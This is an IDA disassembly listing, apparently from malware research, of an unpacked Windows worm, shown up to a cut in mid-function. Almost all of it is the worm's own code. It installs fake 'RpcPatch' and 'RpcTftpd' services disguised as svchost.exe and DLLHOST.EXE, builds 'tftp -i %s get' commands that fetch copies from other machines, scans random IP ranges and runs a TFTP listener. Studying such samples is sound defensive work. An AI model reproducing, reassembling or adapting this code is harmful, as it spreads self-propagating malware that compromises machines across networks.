;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DA8A48FC3AE3C9D7528712D06BB9B074
; File Name : u:\work\da8a48fc3ae3c9d7528712d06bb9b074_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_402A00+D�p
; DATA XREF: sub_40A2D7+EE�r ...
var_230 = dword ptr -230h
var_22C = byte ptr -22Ch
var_228 = dword ptr -228h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 4
sub esp, 230h
push ebp
push esi
push edi
mov ecx, 41h
xor eax, eax
lea edi, [esp+23Ch+var_107]
mov [esp+23Ch+var_108], 0
lea edx, [esp+23Ch+var_108]
rep stosd
mov edi, [esp+23Ch+arg_0]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov [esp+23Ch+var_230], 0
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
push eax
rep movsb
mov ecx, 49h
lea edi, [esp+240h+var_22C]
rep stosd
push 2
call sub_403134 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4010E7
lea ecx, [esp+23Ch+var_230]
mov [esp+23Ch+var_230], 128h
push ecx
push edi
call sub_40312E ; Process32First
test eax, eax
jz short loc_4010E0
mov esi, dword_404120
mov ebp, dword_404140
loc_401091: ; CODE XREF: sub_401000+C9�j
lea edx, [esp+23Ch+var_20C]
push 2Eh
push edx
call esi ; dword_404120
add esp, 8
test eax, eax
jz short loc_4010A4
mov byte ptr [eax], 0
loc_4010A4: ; CODE XREF: sub_401000+9F�j
lea eax, [esp+23Ch+var_108]
lea ecx, [esp+23Ch+var_20C]
push eax
push ecx
call ebp ; dword_404140
add esp, 8
test eax, eax
jz short loc_4010CB
lea edx, [esp+23Ch+var_230]
push edx
push edi
call sub_403128 ; Process32Next
test eax, eax
jz short loc_4010E0
jmp short loc_401091
; ---------------------------------------------------------------------------
loc_4010CB: ; CODE XREF: sub_401000+B8�j
push edi
call dword_4040E0 ; CloseHandle
mov eax, [esp+23Ch+var_228]
pop edi
pop esi
pop ebp
add esp, 230h
retn
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_401000+83�j
; sub_401000+C7�j
push edi
call dword_4040E0 ; CloseHandle
loc_4010E7: ; CODE XREF: sub_401000+6C�j
pop edi
pop esi
xor eax, eax
pop ebp
add esp, 230h
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401100 proc near ; CODE XREF: sub_401470+38�p
var_2 = byte ptr -2
var_1 = byte ptr -1
push ecx
push ebx
push esi
mov esi, dword_40413C
call esi ; dword_40413C
cdq
mov ecx, 11h
idiv ecx
cmp edx, 0Eh
jnz short loc_40112E
call esi ; dword_40413C
mov ebx, eax
and ebx, 80000003h
jns short loc_401129
dec ebx
loc_401125: ; DATA XREF: sub_40A32A+7�r
; sub_41812A+7�r
or ebx, 0FFFFFFFCh
inc ebx
loc_401129: ; CODE XREF: sub_401100+22�j
add bl, 3Fh
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40112E: ; CODE XREF: sub_401100+16�j
cmp edx, 0Fh
jnz short loc_401144
call esi ; dword_40413C
cdq
mov ecx, 2Dh
idiv ecx
mov ebx, edx
add bl, 80h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_401144: ; CODE XREF: sub_401100+31�j
cmp edx, 10h
jnz short loc_40115A
call esi ; dword_40413C
cdq
mov ecx, 9
idiv ecx
mov ebx, edx
loc_401155: ; DATA XREF: sub_40A2D7+1D�r
; sub_4180D7+1D�r
sub bl, 40h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40115A: ; CODE XREF: sub_401100+47�j
mov bl, byte_405BA4[edx]
loc_401160: ; CODE XREF: sub_401100+2C�j
; sub_401100+42�j ...
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401170
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401170: ; CODE XREF: sub_401100+67�j
mov [esp+0Ch+var_2], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401184
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401184: ; CODE XREF: sub_401100+7B�j
mov [esp+0Ch+var_1], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401198
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401198: ; CODE XREF: sub_401100+8F�j
xor edx, edx
xor ecx, ecx
mov ch, [esp+0Ch+var_1]
mov dh, bl
mov dl, [esp+0Ch+var_2]
and eax, 0FFh
shl edx, 10h
or eax, edx
and ecx, 0FFFFh
pop esi
or eax, ecx
pop ebx
pop ecx
retn
sub_401100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011C0 proc near ; CODE XREF: seg000:004030AA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call dword_4040CC ; FreeConsole
call sub_4027B0
test eax, eax
jnz short locret_4011FB
push 104h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call dword_4040D0 ; GetSystemDirectoryA
call sub_402730
sub eax, 2
jz short loc_4011FC
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push eax
push ecx
call sub_4016D0
add esp, 8
locret_4011FB: ; CODE XREF: sub_4011C0+D�j
retn
; ---------------------------------------------------------------------------
loc_4011FC: ; CODE XREF: sub_4011C0+27�j
jmp sub_4027E0
sub_4011C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401280+AF�p
; sub_401280:loc_4013B1�p ...
push esi
mov esi, dword_4040C8
loc_401217: ; CODE XREF: sub_401210+27�j
call sub_401E80
test eax, eax
jnz short loc_401230
loc_401220: ; CODE XREF: sub_401210+1E�j
push 927C0h
call esi ; dword_4040C8
call sub_401E80
test eax, eax
jz short loc_401220
loc_401230: ; CODE XREF: sub_401210+E�j
call sub_401EA0
test eax, eax
jz short loc_401217
mov esi, dword_40411C
push offset dword_407478
push offset aTftpISGetDllho ; "tftp -i %s get dllhost.exe wins\\DLLHOST"...
push offset dword_4075A8
call esi ; dword_40411C
add esp, 0Ch
push offset dword_407478
push offset aTftpISGetSvcho ; "tftp -i %s get svchost.exe wins\\SVCHOST"...
push offset dword_407628
loc_401262: ; DATA XREF: sub_40A2D7+94�w
; seg002:0040AEE1�w
call esi ; dword_40411C
add esp, 0Ch
call sub_4020E0
call sub_402130
pop esi
retn
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401280 proc near ; CODE XREF: sub_4016D0+A�j
; seg000:0040294F�p
var_1A0 = word ptr -1A0h
var_194 = byte ptr -194h
var_190 = byte ptr -190h
sub esp, 1A4h
lea eax, [esp+1A4h+var_190]
push eax
push 202h
call dword_40418C ; WSAStartup
test eax, eax
jnz loc_401359
call sub_402A00
lea ecx, [esp+1A4h+var_1A0]
push ecx
call dword_4040B8 ; GetLocalTime
cmp [esp+1A4h+var_1A0], 7D4h
jnz short loc_4012DB
push offset aRpcpatch ; "RpcPatch"
call sub_402F00
push offset aRpctftpd ; "RpcTftpd"
call sub_402F00
add esp, 8
call sub_402970
push 1
call dword_4040BC ; ExitProcess
loc_4012DB: ; CODE XREF: sub_401280+35�j
push ebx
push ebp
push esi
push edi
call dword_4040C0 ; GetTickCount
push eax
call dword_404104 ; srand
mov esi, dword_4040C8
mov ecx, 10h
mov eax, 0AAAAAAAAh
mov edi, offset dword_406430
add esp, 4
rep stosd
loc_401306: ; CODE XREF: sub_401280+A3�j
push 109A0h
call sub_402FC0
add esp, 4
mov ds:dword_4075A0, eax
push 64h
call esi ; dword_4040C8
mov eax, ds:dword_4075A0
test eax, eax
jz short loc_401306
call sub_401F30
call sub_402170
call sub_401210
call sub_401780
lea edx, [esp+1A4h+var_194]
push edx
push 0
push 0
push offset sub_401990
push 0
push 0
call dword_4040C4 ; CreateThread
test eax, eax
jnz short loc_401360
pop edi
pop esi
pop ebp
pop ebx
loc_401359: ; CODE XREF: sub_401280+18�j
add esp, 1A4h
retn
; ---------------------------------------------------------------------------
loc_401360: ; CODE XREF: sub_401280+D3�j
push eax
call dword_4040E0 ; CloseHandle
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
test eax, eax
jnz short loc_401398
push 3E8h
call esi ; dword_4040C8
call sub_4015E0
push 3E8h
call esi ; dword_4040C8
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
loc_401398: ; CODE XREF: sub_401280+F6�j
push 7D0h
call esi ; dword_4040C8
mov ebx, dword_404190
mov ebp, dword_404194
mov edi, dword_40413C
loc_4013B1: ; CODE XREF: sub_401280+1DE�j
call sub_401210
push offset dword_407478
call ebp ; dword_404194
push eax
call ebx ; dword_404190
mov esi, eax
push 0
and esi, 0FFFF0000h
push 0
push 1
push esi
call sub_401470
add esp, 10h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_4013EA
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_4013EA: ; CODE XREF: sub_401280+163�j
jz short loc_4013F4
add esi, 10000h
jmp short loc_4013FA
; ---------------------------------------------------------------------------
loc_4013F4: ; CODE XREF: sub_401280:loc_4013EA�j
sub esi, 30000h
loc_4013FA: ; CODE XREF: sub_401280+172�j
push 0
push 0
push 3
push esi
call sub_401470
call sub_401210
call edi ; dword_40413C
cdq
mov ecx, 4Ch
xor esi, esi
idiv ecx
push 1
push 0
push 1
mov si, word_40537C[edx*2]
shl esi, 10h
push esi
call sub_401470
add esp, 20h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_401444
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_401444: ; CODE XREF: sub_401280+1BD�j
jz short loc_40144A
push 0
jmp short loc_40144C
; ---------------------------------------------------------------------------
loc_40144A: ; CODE XREF: sub_401280:loc_401444�j
push 1
loc_40144C: ; CODE XREF: sub_401280+1C8�j
push 1
push 1
push esi
call sub_401470
add esp, 10h
call sub_402A00
jmp loc_4013B1
sub_401280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401470 proc near ; CODE XREF: sub_401280+14F�p
; sub_401280+181�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 0Ch
push ebx
push ebp
mov ebp, dword_4040C8
push esi
mov esi, [esp+18h+arg_4]
loc_401480: ; DATA XREF: sub_40A2D7:loc_40A355�w
push edi
shl esi, 10h
loc_401484: ; DATA XREF: sub_40A2D7+85�w
; seg002:loc_40AC7A�r
xor edi, edi
xor ebx, ebx
loc_401488: ; DATA XREF: sub_40A2D7+8C�w
; seg002:0040AA53�r
test esi, esi
mov [esp+1Ch+var_8], 1
mov [esp+1Ch+var_C], ebx
mov [esp+1Ch+var_4], esi
jle loc_4015C7
loc_4014A0: ; CODE XREF: sub_401470+151�j
mov eax, [esp+1Ch+arg_8]
test eax, eax
jz short loc_4014B1
call sub_401100
mov ebx, eax
jmp short loc_4014B7
; ---------------------------------------------------------------------------
loc_4014B1: ; CODE XREF: sub_401470+36�j
mov eax, [esp+1Ch+arg_0]
add ebx, eax
loc_4014B7: ; CODE XREF: sub_401470+3F�j
cmp bl, 0C5h
jz loc_4015B6
mov ecx, ebx
shr ecx, 8
cmp cl, 0C5h
jz loc_4015B6
mov eax, ebx
shr eax, 10h
cmp al, 0C5h
jz loc_4015B6
mov edx, ebx
shr edx, 18h
cmp dl, 0C5h
jz loc_4015B6
cmp bx, 9999h
jz loc_4015B6
cmp cx, 9999h
jz loc_4015B6
cmp ax, 9999h
jz loc_4015B6
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_40152D
push 64h
call ebp ; dword_4040C8
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jz short loc_401575
loc_40152D: ; CODE XREF: sub_401470+A7�j
test edi, edi
jz short loc_401538
push edi
call dword_4040E0 ; CloseHandle
loc_401538: ; CODE XREF: sub_401470+BF�j
push ebx
call dword_404188 ; ntohl
mov [esi], eax
mov eax, [esp+1Ch+arg_C]
test eax, eax
jz short loc_401558
lea eax, [esp+1Ch+arg_4]
push eax
push 0
push esi
push offset sub_402C40
jmp short loc_401565
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401470+D7�j
lea ecx, [esp+1Ch+arg_4]
push ecx
push 0
push esi
push offset sub_402B20
loc_401565: ; CODE XREF: sub_401470+E6�j
push 0
push 0
call dword_4040C4 ; CreateThread
push 2
mov edi, eax
call ebp ; dword_4040C8
loc_401575: ; CODE XREF: sub_401470+BB�j
mov eax, [esp+1Ch+var_8]
test eax, eax
jz short loc_401596
cmp [esp+1Ch+var_C], 12Ch
jl short loc_401596
push 7D0h
call ebp ; dword_4040C8
mov [esp+1Ch+var_8], 0
loc_401596: ; CODE XREF: sub_401470+10B�j
; sub_401470+115�j
cmp ds:dword_4075A4, 12Ch
jl short loc_4015B2
loc_4015A2: ; CODE XREF: sub_401470+140�j
push 2
call ebp ; dword_4040C8
cmp ds:dword_4075A4, 12Ch
jge short loc_4015A2
loc_4015B2: ; CODE XREF: sub_401470+130�j
mov esi, [esp+1Ch+var_4]
loc_4015B6: ; CODE XREF: sub_401470+4A�j
; sub_401470+58�j ...
mov ebx, [esp+1Ch+var_C]
inc ebx
cmp ebx, esi
mov [esp+1Ch+var_C], ebx
jl loc_4014A0
loc_4015C7: ; CODE XREF: sub_401470+2A�j
push 0EA60h
call ebp ; dword_4040C8
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_401470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015E0 proc near ; CODE XREF: sub_401280+FF�p
; sub_4016D0�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
sub esp, 208h
lea eax, [esp+208h+var_104]
push esi
mov esi, dword_40411C
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSDllcacheTftpd ; "%s\\dllcache\\tftpd.exe"
push eax
call esi ; dword_40411C
add esp, 0Ch
lea ecx, [esp+20Ch+var_208]
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsSvchost_e ; "%s\\wins\\svchost.exe"
push ecx
call esi ; dword_40411C
add esp, 0Ch
lea edx, [esp+20Ch+var_208]
lea eax, [esp+20Ch+var_104]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aMsdtc ; "MSDTC"
push offset aSvchost_exe ; "svchost.exe"
push offset aNetworkConnect ; "Network Connections Sharing"
push offset aRpctftpd ; "RpcTftpd"
call sub_4023E0
add esp, 10h
pop esi
add esp, 208h
retn
sub_4015E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401660 proc near ; CODE XREF: sub_4016D0+5�p
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
sub esp, 20Ch
lea eax, [esp+20Ch+var_108]
push 104h
push eax
push 0
call dword_4040A8 ; GetModuleFileNameA
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea ecx, [esp+210h+var_20C]
push offset aSWinsDllhost_e ; "%s\\wins\\DLLHOST.EXE"
push ecx
call dword_40411C ; sprintf
add esp, 0Ch
lea edx, [esp+20Ch+var_20C]
lea eax, [esp+20Ch+var_108]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aBrowser ; "Browser"
push offset aDllhost_exe ; "DLLHOST.EXE"
push offset aWinsClient ; "WINS Client"
push offset aRpcpatch ; "RpcPatch"
call sub_4023E0
add esp, 21Ch
retn
sub_401660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016D0 proc near ; CODE XREF: sub_4011C0+33�p
call sub_4015E0
call sub_401660
jmp sub_401280
sub_4016D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016E0 proc near ; CODE XREF: sub_401780:loc_4018BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
push 0
push 0
push eax
push ecx
push 0
call sub_403110
neg eax
sbb eax, eax
inc eax
retn
sub_4016E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401700 proc near ; CODE XREF: sub_401780+16D�p
var_54 = dword ptr -54h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
arg_0 = dword ptr 4
sub esp, 54h
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+58h+var_44]
rep stosd
lea ecx, [esp+58h+var_54]
lea edx, [esp+58h+var_44]
push ecx
mov ecx, [esp+5Ch+arg_0]
push edx
push eax
push eax
push eax
push eax
push eax
push eax
push ecx
push eax
mov [esp+80h+var_44], 44h
mov [esp+80h+var_40], eax
mov [esp+80h+var_38], eax
mov [esp+80h+var_3C], eax
mov [esp+80h+var_28], eax
mov [esp+80h+var_2C], eax
mov [esp+80h+var_30], eax
mov [esp+80h+var_34], eax
mov [esp+80h+var_14], ax
mov [esp+80h+var_10], eax
mov [esp+80h+var_12], ax
mov [esp+80h+var_18], 1
call dword_4040E4 ; CreateProcessA
mov ecx, [esp+58h+var_54]
pop edi
neg eax
sbb eax, eax
and eax, ecx
add esp, 54h
retn
sub_401700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401780 proc near ; CODE XREF: sub_401280+B4�p
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = word ptr -0B8h
var_B6 = byte ptr -0B6h
var_B4 = byte ptr -0B4h
sub esp, 0C8h
push esi
push edi
loc_401788: ; DATA XREF: seg002:0040A550�o
call sub_402310
mov edi, eax
test edi, edi
jz short loc_40179C
cmp edi, 1
jnz loc_4018C8
loc_40179C: ; CODE XREF: sub_401780+11�j
push edi
call sub_402390
add esp, 4
test eax, eax
jnz loc_4018C8
call dword_4040A0 ; GetOEMCP
mov esi, eax
call dword_4040A4 ; GetSystemDefaultLCID
mov ecx, eax
and ecx, 3FFh
shr ax, 0Ah
cmp esi, 1B5h
jnz short loc_4017E7
cmp cx, 9
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
xor eax, eax
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_4017E7: ; CODE XREF: sub_401780+4D�j
cmp esi, 3A8h
jnz short loc_40180A
cmp cx, 4
jnz loc_40192F
cmp ax, 2
jnz loc_40192F
mov eax, 1
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40180A: ; CODE XREF: sub_401780+6D�j
cmp esi, 3B6h
jnz short loc_40182D
cmp cx, 4
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 2
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40182D: ; CODE XREF: sub_401780+90�j
cmp esi, 3A4h
jz loc_40192F
cmp esi, 3B5h
jnz loc_40192F
cmp cx, 12h
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 3
loc_40185E: ; CODE XREF: sub_401780+65�j
; sub_401780+88�j ...
mov ecx, dword_4061A8
mov edx, dword_4061AC
mov [esp+0D0h+var_C8], ecx
mov ecx, dword_4061B0
mov [esp+0D0h+var_C4], edx
mov edx, dword_4061B4
mov [esp+0D0h+var_C0], ecx
mov cx, word_4061B8
mov [esp+0D0h+var_BC], edx
mov dl, byte_4061BA
test edi, edi
mov [esp+0D0h+var_B8], cx
mov [esp+0D0h+var_B6], dl
jnz short loc_4018AF
mov eax, off_405424[eax*4]
lea ecx, [esp+0D0h+var_C8]
push eax
push ecx
jmp short loc_4018BC
; ---------------------------------------------------------------------------
loc_4018AF: ; CODE XREF: sub_401780+11E�j
mov edx, off_405414[eax*4]
lea eax, [esp+0D0h+var_C8]
push edx
push eax
loc_4018BC: ; CODE XREF: sub_401780+12D�j
call sub_4016E0
add esp, 8
test eax, eax
jnz short loc_4018D3
loc_4018C8: ; CODE XREF: sub_401780+16�j
; sub_401780+27�j
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_4018D3: ; CODE XREF: sub_401780+146�j
lea ecx, [esp+0D0h+var_C8]
lea edx, [esp+0D0h+var_B4]
push ecx
push offset aSNOZQ ; "%s -n -o -z -q"
push edx
call dword_40411C ; sprintf
lea eax, [esp+0DCh+var_B4]
push eax
call sub_401700
mov esi, eax
add esp, 10h
test esi, esi
jnz short loc_401904
pop edi
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_401904: ; CODE XREF: sub_401780+179�j
push 57E40h
push esi
call dword_4040B0 ; WaitForSingleObject
test eax, eax
jz short loc_40193A
push 1
push esi
call dword_4040AC ; TerminateProcess
push esi
call dword_4040E0 ; CloseHandle
lea ecx, [esp+0D0h+var_C8]
push ecx
call dword_4040E8 ; DeleteFileA
loc_40192F: ; CODE XREF: sub_401780+53�j
; sub_401780+5D�j ...
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_40193A: ; CODE XREF: sub_401780+192�j
push esi
call dword_4040E0 ; CloseHandle
mov esi, dword_4040C8
push 3A98h
call esi ; dword_4040C8
lea edx, [esp+0D0h+var_C8]
push edx
call dword_4040E8 ; DeleteFileA
push edi
call sub_402390
add esp, 4
test eax, eax
jz short loc_401977
push 2
call sub_4022A0
add esp, 4
push 4E20h
call esi ; dword_4040C8
loc_401977: ; CODE XREF: sub_401780+1E4�j
pop edi
mov eax, 1
pop esi
add esp, 0C8h
retn
sub_401780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401990 proc near ; DATA XREF: sub_401280+C2�o
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = byte ptr -10h
sub esp, 28h
push ebx
push ebp
push esi
push edi
push 0
push 1
push 2
call dword_404150 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_401AFA
push 0
call dword_404188 ; ntohl
mov [esp+38h+var_20], 2
mov [esp+38h+var_1C], eax
call dword_40413C ; rand
cdq
mov ecx, 64h
mov ebx, dword_404174
idiv ecx
mov ebp, dword_404178
add edx, 29Ah
xor esi, esi
loc_4019E3: ; CODE XREF: sub_401990+8F�j
add dx, si
xor eax, eax
mov al, dh
mov word_405B68, dx
cmp al, 0C5h
jz short loc_401A18
cmp dl, 0C5h
jz short loc_401A18
push edx
call ebx ; dword_404174
lea ecx, [esp+38h+var_20]
push 10h
push ecx
push edi
mov [esp+44h+var_1E], ax
call ebp ; dword_404178
cmp eax, 0FFFFFFFFh
jnz short loc_401A21
mov dx, word_405B68
loc_401A18: ; CODE XREF: sub_401990+63�j
; sub_401990+68�j
inc esi
cmp esi, 3E8h
jl short loc_4019E3
loc_401A21: ; CODE XREF: sub_401990+7F�j
cmp esi, 3E8h
jnz short loc_401A37
call dword_40417C ; WSACleanup
push 1
call dword_4040BC ; ExitProcess
loc_401A37: ; CODE XREF: sub_401990+97�j
push 7D0h
push edi
call dword_404180 ; listen
cmp eax, 0FFFFFFFFh
jz loc_401AF3
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
mov [esp+44h+var_28], 10h
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_401AF3
mov ebp, dword_4040C8
mov ebx, dword_4040C4
loc_401A7C: ; CODE XREF: sub_401990+142�j
push 4
call sub_402FC0
add esp, 4
test eax, eax
jnz short loc_401A9C
push 0Ah
call ebp ; dword_4040C8
push 4
call sub_402FC0
add esp, 4
test eax, eax
jz short loc_401ABC
loc_401A9C: ; CODE XREF: sub_401990+F8�j
lea ecx, [esp+38h+var_24]
mov [eax], esi
push ecx
push 0
push eax
push offset sub_401C80
push 0
push 0
call ebx ; dword_4040C4
test eax, eax
jz short loc_401AE7
push eax
call dword_4040E0 ; CloseHandle
loc_401ABC: ; CODE XREF: sub_401990+10A�j
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401A7C
push edi
call dword_404170 ; closesocket
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
; ---------------------------------------------------------------------------
loc_401AE7: ; CODE XREF: sub_401990+123�j
cmp esi, 0FFFFFFFFh
jz short loc_401AF3
push esi
call dword_404170 ; closesocket
loc_401AF3: ; CODE XREF: sub_401990+B6�j
; sub_401990+DA�j ...
push edi
call dword_404170 ; closesocket
loc_401AFA: ; CODE XREF: sub_401990+18�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
sub_401990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B10 proc near ; CODE XREF: sub_401C80+D8�p
; sub_401C80+121�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [esp+10h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push edi
call dword_404168 ; send
test eax, eax
jnz short loc_401B3C
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B3C: ; CODE XREF: sub_401B10+25�j
mov esi, [esp+10h+arg_8]
mov ebx, dword_40416C
push 0
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_401B7E
mov ebp, dword_404100
loc_401B5C: ; CODE XREF: sub_401B10+6C�j
push offset dword_4061BC
push esi
mov byte ptr [eax+esi], 0
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401B85
push eax
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jnz short loc_401B5C
loc_401B7E: ; CODE XREF: sub_401B10+44�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B85: ; CODE XREF: sub_401B10+5D�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
retn
sub_401B10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B90 proc near ; CODE XREF: sub_401C80+162�p
; sub_401C80+192�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov edx, [esp+4+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov esi, [esp+14h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push esi
call dword_404168 ; send
test eax, eax
jz loc_401C64
lea eax, [esp+14h+var_4]
push 4
push eax
push 1006h
push 0FFFFh
push esi
mov [esp+28h+var_4], 15F90h
call dword_404164 ; setsockopt
mov ebx, dword_4040C0
call ebx ; dword_4040C0
mov edi, [esp+14h+arg_8]
push 0
push 1FFh
push edi
push esi
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
mov ecx, [esp+14h+arg_4]
mov ebp, eax
sub ebp, ecx
cmp esi, 0FFFFFFFFh
jz short loc_401C64
loc_401C0C: ; CODE XREF: sub_401B90+D2�j
mov byte ptr [esi+edi], 0
mov esi, dword_404100
push offset aTransferSucces ; "Transfer successful"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C6C
push offset aTimeoutOccurre ; "Timeout occurred"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
loc_401C32: ; DATA XREF: seg002:0040ACD5�r
jnz short loc_401C64
cmp ebp, 15F2Ch
ja short loc_401C64
call ebx ; dword_4040C0
loc_401C3E: ; DATA XREF: seg002:0040AAB1�r
mov ecx, [esp+14h+arg_0]
push 0
